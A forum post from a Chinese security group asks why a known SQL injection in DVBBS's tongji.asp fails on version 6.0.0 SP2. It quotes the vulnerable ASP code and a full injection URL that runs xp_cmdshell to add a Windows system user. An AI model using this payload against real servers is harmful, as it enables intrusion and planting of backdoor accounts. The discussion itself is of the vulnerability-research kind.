|
![]() | 作者: lbhzz [lbhzz]
![]() |
登录 |
大家都知道了DVBBS的MSSQL以及ACCESS的一些漏洞,比如说向URL提交 www.target.com/asp/dvbbssql/tongji.asp?orders=2&N=2%20password%20from%20admin;%20exec%20master..xp_cmdshell%20'net%20user%20****%20****%20/add'%20-- 就会添加****/****系统用户~但小弟在某日,看到DVBBS VER 6.0.0 SP2<MSHTML>,本认为同属于DVBBS,应该有相同的漏洞才对, --------------------------------------------------------- 6 if request("orders")=1 then 7 call tongji() 8 elseif request("orders")=2 then 9 call topuser() ... 60 sub topuser() 61 set rs=server.createobject("adodb.recordset") 62 sql="select top "&request("n")&" username,useremail,userclass,oicq,homepage,article,addDate from [user] order by article desc" --------------------------------------------------------- 转自-网络安全焦点 也就是变量 n 没有经任何检查就直接放到SQL查询中了。也就是在tongji.asp中,没有经过过滤!但在提交的时候,却出现错误的信息! 小弟不解,欲请教各位,为何在MSSQL和ACCESS中存在的tongji.asp漏洞, 在MSHTML却不存在了? [此贴被 lbhzz(lbhzz) 在 05月06日19时24分 编辑过] |
地主 发表时间: 05/06 19:02 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号